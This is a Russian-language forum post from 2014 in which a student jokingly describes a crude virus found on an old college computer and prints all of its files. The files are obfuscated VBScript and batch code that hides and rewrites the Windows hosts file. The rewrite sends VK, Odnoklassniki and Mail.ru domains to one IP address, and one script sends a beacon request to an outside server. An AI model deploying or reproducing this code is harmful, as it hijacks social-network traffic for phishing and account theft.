Тема: Вирус с технарского компа
Показать сообщение отдельно
Старый 12.02.2014, 16:34   #1
Кирпи4
Социал-сычевист
 
Аватар для Кирпи4
 
Регистрация: 24.06.2011
Сообщений: 611
Написано 342 полезных сообщений
(для 1,359 пользователей)
Игровой проект: Создал(а) один игровой проект в рамках форума boolean.name 
Всего наград 1
Вирус с технарского компа
Привет, булка. Я к вам с такой историей.
Была сегодня пара, всё как обычно, все дрочили мерзкий мне по натуре "1С Бухгалтерия". А я, сдав его неделю назад, искал себе занятку. И вот - мой взор упал на старый комп, что стоял в кабинете. За ним никто не сидел, потому как не работала мышь. Но я, как говорили в русском сериале, "продвинутый юзер", и могу дирижировать маздаем без мыши, с клавы.
Так вот. Запускаю - всё вроде-бы идёт гладко, стоит хрюша, встретившая меня стандартными обоями с зелёным склоном. Антивиря нет, сразу стало понятно, что это вирусная куча в вакууме, так называемая мина, которая только и ждёт контакта с USB-девайсом любого типа, чтобы изнасиловать его во все дыхательно-пихательные. Отбившись от всякой фигни при запуске, полез в реестр, вычистил обнаглевших из Run'а, после отправился в долгое путешествие по двум дискам сего подопытного. Тут взгляд цепляется за папку в Program Files. Название папки - "timoikowboi", что не вызвало особой реакции - мало ли, студенты создали, долго что ли...
Дай-ка загляну. Открываю, внутри папка - "ya ponyal". Замечаю, что начинаю дебильно подхихикивать, а когда открыл папку, начал открыто ржать. Что говорить, давайте я вам всё покажу, содержание всех файлов сего "вируса", который являлся пачкой скриптов на VB (я содрал его оттуда через линь на своём HDD).

Папочка с вирем выглядит вот так:


А теперь, содержание всех файлов по порядку.

Buy Viagra Online.lll
Файл бинарный, 14кб, внутри херня. Скорее всего EXE, точно не скажу

frustratsia.vbs
VBScript, 1кб
const SKAZI_MAMA_SKOLKO = "fundamentalhuman.being"
Set STOIT_MOYA_ZIZN = CreateObject("Scripting.FileSystemObject")
PRIHODI_NA_GRUPPOVUHU=1
SLIMS_LIMS=3
SLIMS_LIMS=SLIMS_LIMS-1
KORNEVOIKOPATEL = STOIT_MOYA_ZIZN.GetSpecialFolder (PRIHODI_NA_GRUPPOVUHU)
Set TERMOYADERNI_GRIBOK = STOIT_MOYA_ZIZN.OpenTextFile(SKAZI_MAMA_SKOLKO,1)
HIDORIOKOLOKOKO=TERMOYADERNI_GRIBOK.ReadLine
KURUATNIK = TERMOYADERNI_GRIBOK.ReadLine
GIDROPON_I_GASH = TERMOYADERNI_GRIBOK.ReadLine
REGGEY_KRUT1 = TERMOYADERNI_GRIBOK.ReadLine
REGGEY_KRUT2 = TERMOYADERNI_GRIBOK.ReadLine
KURUATNIK=KURUATNIK+GIDROPON_I_GASH
REGGEY_KRUT3 = TERMOYADERNI_GRIBOK.ReadLine
ZELENI_SLONIK=KORNEVOIKOPATEL+KURUATNIK+REGGEY_KRUT1+REGGEY_KRUT3
DDD=KORNEVOIKOPATEL+KURUATNIK+REGGEY_KRUT2+REGGEY_KRUT3
TERMOYADERNI_GRIBOK.close
'=======================================
Set RAGGEY_ASTA = STOIT_MOYA_ZIZN.GetFile(ZELENI_SLONIK)
RAGGEY_ASTA.Attributes=SLIMS_LIMS
STOIT_MOYA_ZIZN.OpenTextFile DDD, 8, true, -2
fundamentalhuman.being
Текстовик, 1кб
Блять для связки слов и усилений
\drive
rs\etc\h
ost
оst
s
неудача это тоже блять
gunghoonCialismight.bat
Батник, 4кб
SET KAK_BI_DALEKO_BI_NI_BIL=%windir%
SET /p VETRER_DUET_V_YAITSO=< ViagraVs.Cialis
SET PROSTI_NE_UHODI=%KAK_BI_DALEKO_BI_NI_BIL%%VETRER_DUET_V_YAITSO%
echo ko1213131 >> %PROSTI_NE_UHODI%
SET YA_TVOI_KOWBOIIII=%a_kak_vse_vilo%n%raskaldddik%i%b%ki
SET ROVNO_V_ETOI_MOSKVE=%DVE_SKOVORODKI_MAKARON%.
SET KAK_BI_DALEKO_BI_NI_BIL=%ROVNO_V_ETOI_MOSKVE%
SET KAK_BI_DALEKO_BI_NI_BIL=%KAK_BI_DALEKO_BI_NI_BIL%%TOffffdddd%c%uhhfffkm%om
SET  TANTSEVAT_NA_LUNE=%ROVNO_V_ETOI_MOSKVE%%HH23234F%r

echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 my.mail%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 m.my.mail%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 vk%KAK_BI_DALEKO_BI_NI_BIL%>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 ok%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 m.vk%KAK_BI_DALEKO_BI_NI_BIL%>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 odnoklass%YA_TVOI_KOWBOIIII%%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 vk%KAK_BI_DALEKO_BI_NI_BIL%>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 www.odnoklass%YA_TVOI_KOWBOIIII%%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 m.odnoklass%YA_TVOI_KOWBOIIII%%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 ok%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 m.ok%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
echo %OGNITAM%1%OGNITAM%9%OGNITAM%8%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%4%V_KARMANE_PLAYGIRL%.%OGNITAM%1%OGNITAM%50%V_KARMANE_PLAYGIRL%.%OGNITAM%2%OGNITAM%3%OGNITAM%8 www.odnoklass%YA_TVOI_KOWBOIIII%%TANTSEVAT_NA_LUNE%u>> %PROSTI_NE_UHODI%
ohuennnnnniden.pieben
Текстовик, 5 байт
11111
shotguns.bat
Батник, 1кб
start frustra%eeeeeeeee%tsia.vbs
start subarunew20%eeeeeeeeeeeeeeee%13forester.vbs
subarunew2013forester.vbs
VBScript, 1кб
Set MI_S_TOBOI_SEMIA = CreateObject("MSXML2.XMLHTTP")
DIRKA_MECHTA="/stat/s"
DIN_DONG_DONG="tad/420"
Dim a, b, c,v,g
a=188
b=3
v=31
g=4099
c=cint(a)+cint(b)
SISE="62"
ZLO=DIRKA_MECHTA+DIN_DONG_DONG
STOYAK_KAMENNI="http://64."+SISE+"." &c
c=cint(c)+cint(v)
STOYAK_KAMENNI=STOYAK_KAMENNI+"." &c
c=cint(c)+cint(g)
STOYAK_KAMENNI=STOYAK_KAMENNI+":1122"
MI_S_TOBOI_SEMIA.Open "GET", STOYAK_KAMENNI+ZLO, False
MI_S_TOBOI_SEMIA.Send
ViagraVs.Cialis
Текстовик, 27 байт
\System32\drivers\etc\hosts
В итоге, этот гоповирус
засирает hosts, перенаправляя на свой айпи
__________________
(Offline)
 
 Ответить с цитированием
Сообщение было полезно следующим пользователям:
impersonalis (14.02.2014)